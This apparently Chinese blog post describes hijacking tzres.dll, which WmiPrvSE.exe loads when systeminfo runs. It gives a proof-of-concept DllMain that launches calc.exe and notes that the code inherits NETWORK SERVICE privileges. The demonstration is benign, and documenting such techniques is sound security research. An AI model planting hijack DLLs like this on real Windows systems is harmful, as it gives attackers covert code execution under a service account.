systeminfo、WmiPreSE.exe，dll劫持

原創

2020-06-25 12:34

在執行systeminfo命令時，systeminfo.exe內部通過wmi和LPC的方式獲取數據，WmiPrvse.exe在執行實際操作時會去加載tzres.dll

dll路徑：C:\Windows\System32\wbem\tzres.dll

#include <stdlib.h>
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

由於WmiPrvSE.exe是NETWORK SERVICE權限，所以被創建的子進程都繼承了這個權限。

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

systeminfo、WmiPreSE.exe，dll劫持

systeminfo、WmiPreSE.exe，dll劫持

神祕的藍屏代碼0xc000007e

error MSB4057: 該項目中不存在目標“Deploy”

windbg調試符號下載不了

內核中訪問HKCU註冊表

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結